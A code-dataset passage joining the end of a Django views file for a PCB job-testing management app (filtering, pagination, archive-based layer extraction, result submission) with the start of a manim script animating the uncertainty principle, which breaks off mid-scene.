context['query_job_job_name'] == None:\n            context['query_job_job_name'] = \"\"\n            current_query_data.query_job_job_name=\"\"\n            current_query_data.save()\n        context['jobfortest']= JobForTest.objects.filter(job_name__contains = context['query_job_job_name'])\n        print(\"len of objects-filter by job:\", len(context['jobfortest']))\n\n        # filter by job owner\n        if current_query_data.query_job_author == None:\n            context['query_job_author'] = ''\n        else:\n            context['query_job_author'] = current_query_data.query_job_author\n        print(\"context['query_job_author']:\",context['query_job_author'])\n        context['jobfortest'] = context['jobfortest'].filter(author__username__contains=context['query_job_author'])\n        # print(\"len of objects1:\", len(context['jobfortest']))\n\n        # filter by module name\n        if current_query_data.query_eptest_job_for_test_test_usage_for_epcam_module == None:\n            context['query_eptest_job_for_test_test_usage_for_epcam_module'] = ''\n        else:\n            
context['query_eptest_job_for_test_test_usage_for_epcam_module'] = current_query_data.query_eptest_job_for_test_test_usage_for_epcam_module\n        context['jobfortest'] = context['jobfortest'].filter(test_usage_for_epcam_module__name__contains=context['query_eptest_job_for_test_test_usage_for_epcam_module'])\n\n        # file type\n        context['query_eptest_job_for_test_file_type'] = current_query_data.query_eptest_job_for_test_file_type\n        if context['query_eptest_job_for_test_file_type'] == 'all':\n            pass\n        else:\n            context['jobfortest'] = context['jobfortest'].filter(file_type=context['query_eptest_job_for_test_file_type'])\n\n\n\n        # job status\n        context['query_job_status'] = current_query_data.query_job_status\n        # print(\"query_job_file_usage_type:\",context['query_job_file_usage_type'])\n        if context['query_job_status'] == 'all':\n            pass\n        if context['query_job_status'] == 'draft':\n            context['jobfortest'] = context['jobfortest'].filter(status=\"draft\")\n        if context['query_job_status'] == 'published':\n            context['jobfortest'] = context['jobfortest'].filter(status=\"published\")\n\n        # compare result from the G software\n        context['query_eptest_job_for_test_vs_result_g'] = current_query_data.query_eptest_job_for_test_vs_result_g\n        if context['query_eptest_job_for_test_vs_result_g'] == 'all':\n            pass\n        if context['query_eptest_job_for_test_vs_result_g'] != \"all\":\n            context['jobfortest'] = context['jobfortest'].filter(\n                vs_result_g__contains=context['query_eptest_job_for_test_vs_result_g'])\n\n\n\n\n\n        # rows shown per page\n        context['query_job_paginator_page'] = current_query_data.query_job_paginator_page\n\n        # <------------------------------ end: filtering by the saved values ---------------------------------------------------------->\n\n\n        # <----------------------------------- start: filtering by GET parameters ---------------------------------------------------------->\n        # query data submitted via GET\n        submit_query_get = self.request.GET.get('submit_query_get', False)\n        if submit_query_get:\n            # filter by job name\n            query_job_name = self.request.GET.get('query_job_name', False)\n            context['query_job_job_name'] = query_job_name\n            # persist this filter value first\n            if query_job_name != None:\n                current_query_data.query_job_job_name = query_job_name\n                current_query_data.save()\n            context['jobfortest'] = JobForTest.objects.filter(job_name__contains=context['query_job_job_name'])\n\n            # filter by job owner\n            query_job_author = self.request.GET.get('query_job_author', False)\n            context['query_job_author'] = query_job_author\n            # persist this filter value first\n            if query_job_author != None:\n                current_query_data.query_job_author = query_job_author\n                current_query_data.save()\n            context['jobfortest'] = context['jobfortest'].filter(author__username__contains = query_job_author)\n\n            # filter by module name\n            query_eptest_job_for_test_test_usage_for_epcam_module = self.request.GET.get('query_eptest_job_for_test_test_usage_for_epcam_module', False)\n            context['query_eptest_job_for_test_test_usage_for_epcam_module'] = query_eptest_job_for_test_test_usage_for_epcam_module\n            # persist this filter value first\n            if query_eptest_job_for_test_test_usage_for_epcam_module != None:\n                current_query_data.query_eptest_job_for_test_test_usage_for_epcam_module = query_eptest_job_for_test_test_usage_for_epcam_module\n                current_query_data.save()\n            context['jobfortest'] = context['jobfortest'].filter(test_usage_for_epcam_module__name__contains=query_eptest_job_for_test_test_usage_for_epcam_module)\n\n            # filter by file type\n            query_eptest_job_for_test_file_type = self.request.GET.get(\"query_eptest_job_for_test_file_type\", False)\n            context['query_eptest_job_for_test_file_type'] = query_eptest_job_for_test_file_type\n            # persist this filter value first\n            current_query_data = 
QueryData.objects.get(author=self.request.user)\n            if query_eptest_job_for_test_file_type:\n                current_query_data.query_eptest_job_for_test_file_type = query_eptest_job_for_test_file_type\n                current_query_data.save()\n            if context['query_eptest_job_for_test_file_type'] == 'all':\n                pass\n            else:\n                context['jobfortest'] = context['jobfortest'].filter(file_type=context['query_eptest_job_for_test_file_type'])\n\n\n\n\n            # filter by job status\n            query_job_status = self.request.GET.get(\"query_job_status\", False)\n            context['query_job_status'] = query_job_status\n            # persist this filter value first\n            current_query_data = QueryData.objects.get(author=self.request.user)\n            if query_job_status:\n                current_query_data.query_job_status = query_job_status\n                current_query_data.save()\n            if context['query_job_status'] == 'all':\n                pass\n            if context['query_job_status'] == 'draft':\n                context['jobfortest'] = context['jobfortest'].filter(status=\"draft\")\n            if context['query_job_status'] == 'published':\n                context['jobfortest'] = context['jobfortest'].filter(status=\"published\")\n\n            # compare result from the G software\n            query_eptest_job_for_test_vs_result_g = self.request.GET.get(\"query_eptest_job_for_test_vs_result_g\", False)\n            context['query_eptest_job_for_test_vs_result_g'] = query_eptest_job_for_test_vs_result_g\n            # persist this filter value first\n            current_query_data = QueryData.objects.get(author=self.request.user)\n            if query_eptest_job_for_test_vs_result_g:\n                current_query_data.query_eptest_job_for_test_vs_result_g = query_eptest_job_for_test_vs_result_g\n                current_query_data.save()\n\n            if context['query_eptest_job_for_test_vs_result_g'] == 'all':\n                pass\n            if context['query_eptest_job_for_test_vs_result_g'] != \"all\":\n                context['jobfortest'] = context['jobfortest'].filter(\n                    vs_result_g__contains=context['query_eptest_job_for_test_vs_result_g'])\n\n\n            # rows shown per page\n            query_job_paginator_page = self.request.GET.get('query_job_paginator_page', False)\n            context['query_job_paginator_page'] = query_job_paginator_page\n            # persist the rows-per-page choice\n            if query_job_paginator_page != None:\n                current_query_data.query_job_paginator_page = query_job_paginator_page\n                current_query_data.save()\n        # <----------------------------------- end: filtering by GET parameters ---------------------------------------------------------->\n\n\n        # <-------------------------------------- start: tag filter ---------------------------------------------------------->\n        tag_slug = self.kwargs.get('tag_slug', None)\n        if tag_slug:\n            print(\"tag_slug:\", tag_slug)\n            # look the tag up in the MyTag table\n            tag = get_object_or_404(MyTagForEptest, slug=tag_slug)\n            context['jobfortest'] = context['jobfortest'].filter(tags__in=[tag])\n        # <-------------------------------------- end: tag filter ---------------------------------------------------------->\n\n\n        # <-------------------------------------- start: exact search by job ID -------------------------------------------------->\n        search_by_job_id = self.request.GET.get('search_by_job_id', False)\n        if search_by_job_id:\n            print(\"search_by_job_id:\", search_by_job_id)\n            context['jobfortest'] = JobForTest.objects.filter(Q(id=search_by_job_id))\n        # <-------------------------------------- end: exact search by job ID -------------------------------------------------->\n\n\n\n        # With many jobs the list spans several pages. When editing an entry that is not on the first page\n        # (say a job on page 3), we would be redirected to a fixed page after saving unless the page number\n        # is remembered. The code below remembers the current page.\n        if self.request.GET.__contains__(\"page\"):\n            current_page = self.request.GET[\"page\"]\n            print(\"current_page\", current_page)\n            context['current_page'] = current_page\n        else:\n            context['current_page'] = 1\n\n\n\n        print(\"len of objects:\",len(context['jobfortest']))\n
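# --- Added aside (sketch, not in the original view) ------------------------
# The repeated "read GET param, persist to QueryData, apply filter" blocks
# above could be table-driven; field names and lookups are taken from the
# code, the helper itself is hypothetical.
TEXT_FILTERS = {
    # GET param: (QueryData field, ORM lookup)
    'query_job_name': ('query_job_job_name', 'job_name__contains'),
    'query_job_author': ('query_job_author', 'author__username__contains'),
}

def apply_text_filters(request, queryset, saved):
    for param, (field, lookup) in TEXT_FILTERS.items():
        value = request.GET.get(param)
        if value is not None:
            setattr(saved, field, value)  # remember the choice for next visit
            queryset = queryset.filter(**{lookup: value})
    saved.save()
    return queryset
# --------------------------------------------------------------------------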
\n        # <----------------------------------------------- start: pagination ----------------------------------------------------->\n        page = self.request.GET.get('page')\n        paginator = Paginator(context['jobfortest'], context['query_job_paginator_page'])  # rows per page\n        print(\"page:::\", page)\n        try:\n            context['jobs_page'] = paginator.page(page)\n        except PageNotAnInteger:\n            # if the page parameter is not an integer, return the first page\n            context['jobs_page'] = paginator.page(1)\n        except EmptyPage:\n            # if the page number is beyond the last page, return the last page\n            context['jobs_page'] = paginator.page(paginator.num_pages)\n        pagination_data = self.get_pagination_data(paginator, context['jobs_page'])\n        context.update(pagination_data)\n        # <----------------------------------------------- end: pagination ----------------------------------------------------->\n\n\n        return context\n\n    def get_pagination_data(self, paginator, page_obj, around_count=2):\n        left_has_more = False\n\n        right_has_more = False\n        current_page = page_obj.number\n        if current_page <= around_count + 2:\n            left_range = range(1, current_page)\n        else:\n            left_has_more = True\n            left_range = range(current_page - around_count, current_page)\n\n        if current_page >= paginator.num_pages - around_count - 1:\n            right_range = range(current_page + 1, paginator.num_pages + 1)\n        else:\n            right_has_more = True\n            right_range = range(current_page + 1, current_page + around_count + 1)\n\n        pagination_data = {\n            'left_has_more': left_has_more,\n            'right_has_more': right_has_more,\n            'left_range': left_range,\n            'right_range': right_range\n        }\n        return pagination_data\n\n\n    def post(self, request): # ***** this method required! ******\n        self.object_list = self.get_queryset()\n        if request.method == 'POST':\n            print(\"POST!!!\")\n\n            # used by the page-jump control\n            if request.POST.__contains__(\"page_jump\"):\n                print(request.POST.get(\"page_jump\"))\n                return HttpResponse(request.POST.get(\"page_jump\"))\n\n\nclass JobForTestDetailViewForm(DetailView):\n    model = JobForTest\n    template_name = \"JobForTestDetailViewForm.html\"\n    context_object_name = \"job_for_test\"\n    pk_url_kwarg = \"pk\"  # pk_url_kwarg defaults to pk; it can be overridden here, but it must match the named group in the URL\n\n\n    def get_form(self):\n        self.pk = self.kwargs['pk']\n        # print(\"pk:\",pk)\n        job = JobForTest.objects.filter(id=self.pk).first()\n        return JobForTestFormsReadOnly(instance=job)\n\n    def get_context_data(self,*args, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['now'] = timezone.now()\n        context['form'] = self.get_form()\n        context['job_id'] = self.pk\n        return context\n\n\nclass JobForTestUpdateView(UpdateView):\n    \"\"\"\n    This class needs a pk or slug for the lookup (it calls self.object = self.get_object())\n    \"\"\"\n    model = JobForTest\n    fields = \"__all__\"\n    template_name = 'JobForTestUpdateView.html'\n\n    def get(self, request, *args, **kwargs):\n\n        job_update = JobForTest.objects.get(id=self.kwargs['pk'])\n        form=JobForTestForm(instance=job_update)\n        self.job_id = job_update.id\n        print(\"ccabc:\", len(Job.objects.filter(id=job_update.job_parent_id)))\n        if len(Job.objects.filter(id=job_update.job_parent_id)):\n            self.job_parent_id = Job.objects.filter(id = job_update.job_parent_id)[0].id\n            self.job_parent = job_update.job_parent\n        else:\n            self.job_parent_id = None\n            self.job_parent = None\n\n        current_page = self.kwargs['current_page']\n        print(\"current_page\",current_page)\n        return render(request, 'JobForTestUpdateView.html', {'form':form,'job_parent_id':self.job_parent_id,'job_parent':self.job_parent})\n\n    def get_success_url(self):\n        return '../../JobForTestListView?page={}'.format(self.kwargs['current_page'])\n\n
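# --- Added worked example for get_pagination_data() above ------------------
# num_pages = 20, current page 8, around_count = 2:
#   left_has_more  = True          (8 > 2 + 2, so pages 1..5 are elided)
#   left_range     = range(6, 8)   -> pages 6, 7
#   right_range    = range(9, 11)  -> pages 9, 10
#   right_has_more = True          (8 < 20 - 2 - 1)
# --------------------------------------------------------------------------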
template_name = \"JobForTestCreateView.html\"\n fields = \"__all__\"\n #设置新增料号时,自动填写上当前用户\n def get_initial(self):\n # Get the initial dictionary from the superclass method\n initial = super(JobForTestCreateView, self).get_initial()\n # Copy the dictionary so we don't accidentally change a mutable dict\n initial = initial.copy()\n initial['author'] = self.request.user\n return initial\n success_url = 'JobForTestListView'\n\n\n\n def get_context_data(self, **kwargs):\n context = super(JobForTestCreateView, self).get_context_data(**kwargs)\n if self.request.method == 'POST':\n pass\n\n else:\n pass\n\n #暂时用不着下面的方法\n # context['get_customer_pcb_factory']=self.get_customer_pcb_factory()\n # context['get_customer_pcb_design'] = self.get_customer_pcb_design()\n\n return context\n\n\nclass JobForTestDeleteView(DeleteView):\n \"\"\"\n \"\"\"\n model = JobForTest\n template_name = 'JobForTestDeleteView.html'\n success_url = reverse_lazy('eptest:JobForTestListView')\n\n\n\n\ndef get_layer_name_from_org(request,job_id):\n print(job_id)\n # 找到job对象\n job = JobForTest.objects.get(id=job_id)\n #先删除原来已有的层信息\n layer_old=Layer.objects.filter(job=job)\n print(layer_old)\n layer_old.delete()\n\n\n print(job.job_name, job.file)\n\n # 先拿到原始料号,放到临时文件夹,完成解压\n temp_path = r'C:\\cc\\share\\temp'+\"_\"+str(request.user)+\"_\"+str(job_id)\n if not os.path.exists(temp_path):\n os.mkdir(temp_path)\n\n org_file_path = (os.path.join(settings.BASE_DIR, r'media', str(job.file))).replace(r'/', '\\\\')\n shutil.copy(org_file_path, temp_path)\n time.sleep(0.2)\n rf = rarfile.RarFile(os.path.join(temp_path, str(job.file).split(\"/\")[1]))\n rf.extractall(temp_path)\n temp_compressed = os.path.join(temp_path, str(job.file).split(\"/\")[1])\n if os.path.exists(temp_compressed):\n os.remove(temp_compressed)\n file_path_gerber = os.listdir(temp_path)[0]\n print(file_path_gerber)\n\n\n\n list = os.listdir(os.path.join(temp_path,file_path_gerber)) # 列出文件夹下所有的目录与文件\n index=1\n for i in range(0, len(list)):\n path = os.path.join(os.path.join(temp_path,file_path_gerber), list[i])\n if os.path.isfile(path):\n pass\n print(path)\n file_name=list[i]\n file_name_org=list[i]\n if CCMethod.is_chinese(path):\n pass\n os.rename(path,os.path.join(temp_path,file_path_gerber,'unknow' + str(index)))\n file_name='unknow' + str(index)\n index=index+1\n file_name=file_name.replace(' ','-')\n file_name = file_name.replace('(', '-')\n file_name = file_name.replace(')', '-')\n layer_new = Layer()\n layer_new.job=job\n layer_new.layer=file_name\n layer_new.layer_org=file_name_org\n layer_new.save()\n # 删除temp_path\n if os.path.exists(temp_path):\n shutil.rmtree(temp_path)\n\n job.bool_layer_info='true'\n job.save()\n # return redirect('job_manage:JobListViewVs')\n # return redirect('../../../../../admin/#/admin/eptest/jobfortest/')\n # return HttpResponse(\"已完成!请F5刷新页面!\")\n return render(request,r'get_layer_info.html')\n\n\n\n@csrf_exempt\ndef send_vs_g_local_result(request):\n if request.method == 'POST':\n print(\"post\")\n # print(request.body)\n print(request.POST)\n body=json.loads(request.body)\n print(body,type(body))\n body_dict=json.loads(body)\n print(body_dict,type(body_dict))\n job_id = body_dict[\"job_id\"]\n job = JobForTest.objects.get(id=job_id)\n print(job)\n vs_time_g=body_dict[\"vs_time_g\"]\n g_vs_total_result_flag=True\n\n if len(body_dict[\"all_result_g\"]) == 0:\n g_vs_total_result_flag = False\n\n\n # 原始层文件信息,最全的\n all_layer_from_org = Layer.objects.filter(job=job)\n for item in body_dict[\"all_result_g\"].items():\n 
\n\n@csrf_exempt\ndef send_vs_g_local_result(request):\n    if request.method == 'POST':\n        print(\"post\")\n        # print(request.body)\n        print(request.POST)\n        body=json.loads(request.body)\n        print(body,type(body))\n        body_dict=json.loads(body)\n        print(body_dict,type(body_dict))\n        job_id = body_dict[\"job_id\"]\n        job = JobForTest.objects.get(id=job_id)\n        print(job)\n        vs_time_g=body_dict[\"vs_time_g\"]\n        g_vs_total_result_flag=True\n\n        if len(body_dict[\"all_result_g\"]) == 0:\n            g_vs_total_result_flag = False\n\n\n        # the original layer-file info (the complete set)\n        all_layer_from_org = Layer.objects.filter(job=job)\n        for item in body_dict[\"all_result_g\"].items():\n            print(item[0],item[1])\n            for each in all_layer_from_org:\n                # print(\"layer:\",layer,\"str(each.layer_org).lower():\",str(each.layer_org).lower().replace(\" \",\"-\").replace(\"(\",\"-\").replace(\")\",\"-\"))\n                if item[0] == str(each.layer_org).lower().replace(\" \", \"-\").replace(\"(\", \"-\").replace(\")\", \"-\"):\n                    print(\"I find it!!!!!!!!!!!!!!\")\n                    new_vs = Vs()\n                    new_vs.job = job\n                    new_vs.layer = each.layer\n                    new_vs.layer_org = each.layer_org\n                    new_vs.vs_result_detail = str(item[1])\n                    new_vs.vs_method = 'g'\n                    new_vs.layer_file_type = each.layer_file_type\n                    new_vs.layer_type = each.layer_type\n                    new_vs.vs_time_g = vs_time_g\n                    try:\n                        if item[1] == '正常':\n                            each.vs_result_g = 'passed'\n                            new_vs.vs_result = 'passed'\n                        elif item[1] == '错误':\n                            each.vs_result_g = 'failed'\n                            new_vs.vs_result = 'failed'\n                            g_vs_total_result_flag = False\n                        elif item[1] == '未比对':\n                            each.vs_result_g = 'none'\n                            new_vs.vs_result = 'none'\n                            g_vs_total_result_flag = False\n                        else:\n                            each.vs_result_g = 'failed'\n                            new_vs.vs_result = 'failed'\n                            g_vs_total_result_flag = False\n                            print(\"Unexpected result status!!!\")\n\n                    except:\n                        pass\n                        print(\"Exception!\")\n                    each.vs_time_g = vs_time_g\n                    # print(\"each:\",each)\n                    each.save()\n                    # print(\"new_vs:\",new_vs)\n                    new_vs.save()\n\n        if g_vs_total_result_flag == True:\n            pass\n            job.vs_result_g = 'passed'\n        if g_vs_total_result_flag == False:\n            pass\n            job.vs_result_g = 'failed'\n        job.vs_time_g = vs_time_g\n        job.save()\n\n        temp_path=r\"C:\\cc\\share\\temp\"\n        # remove temp_path\n        if os.path.exists(temp_path):\n            shutil.rmtree(temp_path)\n\n        return HttpResponse(\"提交完成!!!\")\n\n    return render(request,\"send_vs_g_local_result.html\")\n\n\ndef view_vs_g(request,job_id):\n    pass\n    # fetch the job object\n    job=JobForTest.objects.get(id=job_id)\n    print(job.job_name,job.file)\n    vs = Vs.objects.filter(job=job,vs_time_g=job.vs_time_g)\n\n    field_verbose_name = [Vs._meta.get_field('job').verbose_name,\n                          Vs._meta.get_field('layer').verbose_name,\n                          Vs._meta.get_field('layer_org').verbose_name,\n                          Vs._meta.get_field('vs_result').verbose_name,\n                          Vs._meta.get_field('vs_result_detail').verbose_name,\n                          Vs._meta.get_field('vs_method').verbose_name,\n                          Vs._meta.get_field('layer_file_type').verbose_name,\n                          Vs._meta.get_field('layer_type').verbose_name,\n                          Vs._meta.get_field('features_count').verbose_name,\n                          Vs._meta.get_field('status').verbose_name,\n                          Vs._meta.get_field('vs_time_ep').verbose_name,\n                          Vs._meta.get_field('vs_time_g').verbose_name,\n                          Vs._meta.get_field('create_time').verbose_name,\n                          Vs._meta.get_field('updated').verbose_name,\n                          \"标签\",\n                          \"操作\",\n                          ]\n\n    # return redirect('job_manage:LayerListView')\n    return render(request, 'VsListViewOneJob.html', {'field_verbose_name': field_verbose_name, 'vs': vs,'job':job})\n\n\ndef test(request):\n    pass\n    return render(request,'test.html')\n\n\n","repo_name":"naivete13sky/epdms","sub_path":"eptest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":27368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30258832533","text":"# -*- coding: utf-8 -*-\n\nimport scipy\nfrom manim_imports_ext import *\nfrom _2018.fourier import *\n\nimport warnings\nwarnings.warn(\"\"\"\n    Warning: This file makes use of\n    ContinualAnimation, which has since\n    been deprecated\n\"\"\")\n\nFREQUENCY_COLOR = RED\nUSE_ALMOST_FOURIER_BY_DEFAULT = False\n\nclass GaussianDistributionWrapper(Line):\n    \"\"\"\n    This is meant to encode a 2d normal distribution as\n    a mobject (so as to be able to have it be interpolated\n    during animations). It is a line whose center is the mean
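# --- Added aside: the sampling used by GaussianDistributionWrapper here
# reduces to per-coordinate normal draws (mu = line center, sigma = radial
# vector); a standalone numpy equivalent:
import numpy as np

def sample_points(mu, sigma, size=1):
    # mu and sigma are 3-vectors; zero sigma components collapse to mu
    return np.random.normal(np.asarray(mu), np.abs(np.asarray(sigma)), (size, len(mu)))
# --------------------------------------------------------------------------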
It is a line whose center is the mean\n mu of a distribution, and whose radial vector (center to end)\n is the distribution's standard deviation\n \"\"\"\n CONFIG = {\n \"stroke_width\" : 0,\n \"mu\" : ORIGIN,\n \"sigma\" : RIGHT,\n }\n def __init__(self, **kwargs):\n Line.__init__(self, ORIGIN, RIGHT, **kwargs)\n self.change_parameters(self.mu, self.sigma)\n\n def change_parameters(self, mu = None, sigma = None):\n curr_mu, curr_sigma = self.get_parameters()\n mu = mu if mu is not None else curr_mu\n sigma = sigma if sigma is not None else curr_sigma\n self.put_start_and_end_on(mu - sigma, mu + sigma)\n return self\n\n def get_parameters(self):\n \"\"\" Return mu_x, mu_y, sigma_x, sigma_y\"\"\"\n center, end = self.get_center(), self.get_end()\n return center, end-center\n\n def get_random_points(self, size = 1):\n mu, sigma = self.get_parameters()\n return np.array([\n np.array([\n np.random.normal(mu_coord, sigma_coord)\n for mu_coord, sigma_coord in zip(mu, sigma)\n ])\n for x in range(size)\n ])\n\nclass ProbabalisticMobjectCloud(ContinualAnimation):\n CONFIG = {\n \"fill_opacity\" : 0.25,\n \"n_copies\" : 100,\n \"gaussian_distribution_wrapper_config\" : {},\n \"time_per_change\" : 1./60,\n \"start_up_time\" : 0,\n }\n def __init__(self, prototype, **kwargs):\n digest_config(self, kwargs)\n fill_opacity = self.fill_opacity or prototype.get_fill_opacity()\n if \"mu\" not in self.gaussian_distribution_wrapper_config:\n self.gaussian_distribution_wrapper_config[\"mu\"] = prototype.get_center()\n self.gaussian_distribution_wrapper = GaussianDistributionWrapper(\n **self.gaussian_distribution_wrapper_config\n )\n self.time_since_last_change = np.inf\n group = VGroup(*[\n prototype.copy().set_fill(opacity = fill_opacity)\n for x in range(self.n_copies)\n ])\n ContinualAnimation.__init__(self, group, **kwargs)\n self.update_mobject(0)\n\n def update_mobject(self, dt):\n self.time_since_last_change += dt\n if self.time_since_last_change < self.time_per_change:\n return\n self.time_since_last_change = 0\n\n group = self.mobject\n points = self.gaussian_distribution_wrapper.get_random_points(len(group))\n for mob, point in zip(group, points):\n self.update_mobject_by_point(mob, point)\n return self\n\n def update_mobject_by_point(self, mobject, point):\n mobject.move_to(point)\n return self\n\nclass ProbabalisticDotCloud(ProbabalisticMobjectCloud):\n CONFIG = {\n \"color\" : BLUE,\n }\n def __init__(self, **kwargs):\n digest_config(self, kwargs)\n dot = Dot(color = self.color)\n ProbabalisticMobjectCloud.__init__(self, dot)\n\nclass ProbabalisticVectorCloud(ProbabalisticMobjectCloud):\n CONFIG = {\n \"color\" : RED,\n \"n_copies\" : 20,\n \"fill_opacity\" : 0.5,\n \"center_func\" : lambda : ORIGIN,\n }\n def __init__(self, **kwargs):\n digest_config(self, kwargs)\n vector = Vector(\n RIGHT, color = self.color,\n max_tip_length_to_length_ratio = 1,\n )\n ProbabalisticMobjectCloud.__init__(self, vector)\n\n def update_mobject_by_point(self, vector, point):\n vector.put_start_and_end_on(\n self.center_func(),\n point\n )\n\nclass RadarDish(SVGMobject):\n CONFIG = {\n \"file_name\" : \"radar_dish\",\n \"fill_color\" : GREY_B,\n \"stroke_color\" : WHITE,\n \"stroke_width\" : 1,\n \"height\" : 1,\n }\n\nclass Plane(SVGMobject):\n CONFIG = {\n \"file_name\" : \"plane\",\n \"color\" : GREY_B,\n \"height\" : 1,\n }\n def __init__(self, **kwargs):\n SVGMobject.__init__(self, **kwargs)\n self.rotate(-TAU/4)\n\nclass FalconHeavy(SVGMobject):\n CONFIG = {\n \"file_name\" : \"falcon_heavy\",\n \"color\" : 
WHITE,\n \"logo_color\" : BLUE_E,\n \"height\" : 1.5,\n }\n def __init__(self, **kwargs):\n SVGMobject.__init__(self, **kwargs)\n self.logo = self[-9:]\n self.logo.set_color(self.logo_color)\n\nclass RadarPulseSingleton(ContinualAnimation):\n CONFIG = {\n \"speed\" : 3.0,\n \"direction\" : RIGHT,\n \"start_up_time\" : 0,\n \"fade_in_time\" : 0.5,\n \"color\" : WHITE,\n \"stroke_width\" : 3,\n }\n def __init__(self, radar_dish, target, **kwargs):\n digest_config(self, kwargs)\n self.direction = self.direction/get_norm(self.direction)\n self.radar_dish = radar_dish\n self.target = target\n self.reflection_distance = None\n self.arc = Arc(\n start_angle = -30*DEGREES,\n angle = 60*DEGREES,\n )\n self.arc.set_height(0.75*radar_dish.get_height())\n self.arc.move_to(radar_dish, UP+RIGHT)\n self.start_points = np.array(self.arc.get_points())\n self.start_center = self.arc.get_center()\n self.finished = False\n\n ContinualAnimation.__init__(self, self.arc, **kwargs)\n \n def update_mobject(self, dt):\n arc = self.arc\n total_distance = self.speed*self.internal_time\n arc.set_points(self.start_points)\n arc.shift(total_distance*self.direction)\n\n if self.internal_time < self.fade_in_time:\n alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)\n arc.set_stroke(self.color, alpha*self.stroke_width)\n\n if self.reflection_distance is None:\n #Check if reflection is happening\n arc_point = arc.get_edge_center(self.direction)\n target_point = self.target.get_edge_center(-self.direction)\n arc_distance = np.dot(arc_point, self.direction)\n target_distance = np.dot(target_point, self.direction)\n if arc_distance > target_distance:\n self.reflection_distance = target_distance\n #Don't use elif in case the above code creates reflection_distance\n if self.reflection_distance is not None:\n delta_distance = total_distance - self.reflection_distance\n point_distances = np.dot(self.direction, arc.get_points().T)\n diffs = point_distances - self.reflection_distance\n shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)\n arc.set_points(arc.get_points() + shift_vals)\n\n #Check if done\n arc_point = arc.get_edge_center(-self.direction)\n if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):\n self.finished = True\n self.arc.fade(1)\n\n def is_finished(self):\n return self.finished\n\nclass RadarPulse(ContinualAnimation):\n CONFIG = {\n \"n_pulse_singletons\" : 8,\n \"frequency\" : 0.05,\n \"colors\" : [BLUE, YELLOW]\n }\n def __init__(self, *args, **kwargs):\n digest_config(self, kwargs)\n colors = color_gradient(self.colors, self.n_pulse_singletons)\n self.pulse_singletons = [\n RadarPulseSingleton(*args, color = color, **kwargs)\n for color in colors\n ]\n pluse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])\n ContinualAnimation.__init__(self, pluse_mobjects, **kwargs)\n \n def update_mobject(self, dt):\n for i, ps in enumerate(self.pulse_singletons):\n ps.internal_time = self.internal_time - i*self.frequency\n ps.update_mobject(dt)\n\n def is_finished(self):\n return all([ps.is_finished() for ps in self.pulse_singletons])\n\nclass MultipleFlashes(Succession):\n CONFIG = {\n \"run_time_per_flash\" : 1.0,\n \"num_flashes\" : 3,\n }\n def __init__(self, *args, **kwargs):\n digest_config(self, kwargs)\n kwargs[\"run_time\"] = self.run_time_per_flash\n Succession.__init__(self, *[\n Flash(*args, **kwargs)\n for x in range(self.num_flashes)\n ])\n\nclass TrafficLight(SVGMobject):\n CONFIG = {\n \"file_name\" : \"traffic_light\",\n \"height\" : 0.7,\n 
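# --- Added standalone check of the reflection step in
# RadarPulseSingleton.update_mobject above (points past the target plane are
# mirrored back across it via np.outer):
import numpy as np

def reflection_demo():
    direction = np.array([1.0, 0.0, 0.0])
    plane_distance = 2.0  # signed distance of the reflecting plane
    pts = np.array([[1.5, 0.0, 0.0], [3.0, 1.0, 0.0]])
    diffs = pts.dot(direction) - plane_distance  # overshoot past the plane
    reflected = pts + np.outer(-2 * np.maximum(diffs, 0), direction)
    # -> [[1.5, 0, 0], [1.0, 1, 0]]: only the overshooting point moves,
    #    ending up as far in front of the plane as it was behind it
    return reflected
# --------------------------------------------------------------------------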
\"post_height\" : 2,\n \"post_width\" : 0.05,\n }\n def __init__(self, **kwargs):\n SVGMobject.__init__(self, **kwargs)\n post = Rectangle(\n height = self.post_height,\n width = self.post_width,\n stroke_width = 0,\n fill_color = WHITE,\n fill_opacity = 1,\n )\n self.move_to(post.get_top(), DOWN)\n self.add_to_back(post)\n\n###################\n\nclass MentionUncertaintyPrinciple(TeacherStudentsScene):\n def construct(self):\n title = OldTexText(\"Heisenberg Uncertainty Principle\")\n title.to_edge(UP)\n\n dot_cloud = ProbabalisticDotCloud()\n vector_cloud = ProbabalisticVectorCloud(\n gaussian_distribution_wrapper_config = {\"sigma_x\" : 0.2},\n center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],\n )\n for cloud in dot_cloud, vector_cloud:\n cloud.gaussian_distribution_wrapper.next_to(\n title, DOWN, 2*LARGE_BUFF\n )\n vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)\n\n def get_brace_text_group_update(gdw, vect, text, color):\n brace = Brace(gdw, vect)\n text = brace.get_tex(\"2\\\\sigma_{\\\\text{%s}}\"%text, buff = SMALL_BUFF)\n group = VGroup(brace, text)\n def update_group(group):\n brace, text = group\n brace.match_width(gdw, stretch = True)\n brace.next_to(gdw, vect)\n text.next_to(brace, vect, buff = SMALL_BUFF)\n group.set_color(color)\n return Mobject.add_updater(group, update_group)\n\n dot_brace_anim = get_brace_text_group_update(\n dot_cloud.gaussian_distribution_wrapper,\n DOWN, \"position\", dot_cloud.color\n )\n vector_brace_anim = get_brace_text_group_update(\n vector_cloud.gaussian_distribution_wrapper,\n UP, \"momentum\", vector_cloud.color\n )\n\n self.add(title)\n self.add(dot_cloud)\n self.play(\n Write(title),\n self.teacher.change, \"raise_right_hand\",\n self.change_students(*[\"pondering\"]*3)\n )\n self.play(\n Write(dot_brace_anim.mobject, run_time = 1)\n )\n self.add(dot_brace_anim)\n self.wait()\n # self.wait(2)\n self.play(\n dot_cloud.gaussian_distribution_wrapper.change_parameters, \n {\"sigma\" : 0.1*RIGHT},\n run_time = 2,\n )\n self.wait()\n self.add(vector_cloud)\n self.play(\n FadeIn(vector_brace_anim.mobject)\n )\n self.add(vector_brace_anim)\n self.play(\n vector_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : RIGHT},\n self.change_students(*3*[\"confused\"]),\n run_time = 3,\n )\n #Back and forth\n for x in range(2):\n self.play(\n dot_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 2*RIGHT},\n vector_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 